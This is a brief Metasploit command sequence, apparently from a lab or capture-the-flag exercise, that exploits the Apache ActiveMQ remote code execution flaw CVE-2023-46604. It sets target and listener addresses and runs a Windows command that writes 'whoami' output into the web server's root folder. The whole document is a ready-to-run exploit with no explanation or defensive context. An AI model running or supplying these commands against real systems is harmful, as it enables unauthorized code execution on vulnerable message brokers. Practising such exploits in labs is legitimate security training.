use exploit/multi/misc/apache_activemq_rce_cve_2023_46604
set RHOSTS 10.129.230.70
set RPORT 61616
set LHOST 10.10.14.2
set LPORT 4444
set payload cmd/windows/generic
set CMD cmd /c whoami > C:\inetpub\wwwroot\r.txt 2>&1
run
